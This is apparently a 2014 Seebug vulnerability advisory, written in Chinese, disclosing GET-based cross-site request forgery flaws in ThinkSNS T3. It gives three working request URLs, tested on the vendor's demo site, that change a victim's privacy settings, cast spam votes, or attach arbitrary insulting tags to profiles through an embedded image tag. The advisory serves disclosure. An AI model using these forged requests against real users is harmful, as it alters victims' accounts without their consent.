ThinkSNS多处GET型CSRF(打包)

2014-02-12T00:00:00
ID SSV:94258
Type seebug
Reporter Root
Modified 2014-02-12T00:00:00

Description

简要描述:

ThinkSNS多处CSRF(GET型),可造成一定危害

详细说明:

就拿你们的演示站点做了测试(是T3的最新版本)

http://demo.thinksns.com/


ThinkSNS最新版本内对于POST请求的来源是进行了判断的

<img src="https://images.seebug.org/upload/201402/07112637efc5a30793c4f4804c5cb52845325747.png" alt="0.png" width="600" onerror="javascript:errimg(this);">

但是ThinkSNS最新版本对于POST和GET请求是不分的,而且GET请求的是可以在网站内用<img>标签发起的,将导致严重的安全问题,我就选取了一些发上来。

漏洞证明:

1)更改个人设置中的隐私设置(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSavePrivacy&comment_weibo=1&message=1&space=1

<img src="https://images.seebug.org/upload/201402/07113025d9dce38059dcd3743586e6f6523a122c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

2)发起大量垃圾投票(可刷分/通过GET请求实现):

http://demo.thinksns.com/t3/index.php?app=vote&mod=Index&act=add&date=7&opt%5B%5D=%E4%BD%A0%E5%B8%85&opt%5B%5D=%E6%88%91%E5%B8%85&title=%E7%8E%A9%E7%8E%A9&type=0

<img src="https://images.seebug.org/upload/201402/07113445e823baf7319c9aaa9a9804c116c3e8ab.png" alt="CSRF.png" width="600" onerror="javascript:errimg(this);">

3)可给任何用户加“傻X”(任意)标签,请求如下(通过GET请求实现)

http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile&tag_num=5&user_tags=785

<img src="https://images.seebug.org/upload/201402/07112902b7d750c619242911d573afdb10a41d42.png" alt="1.png" width="600" onerror="javascript:errimg(this);">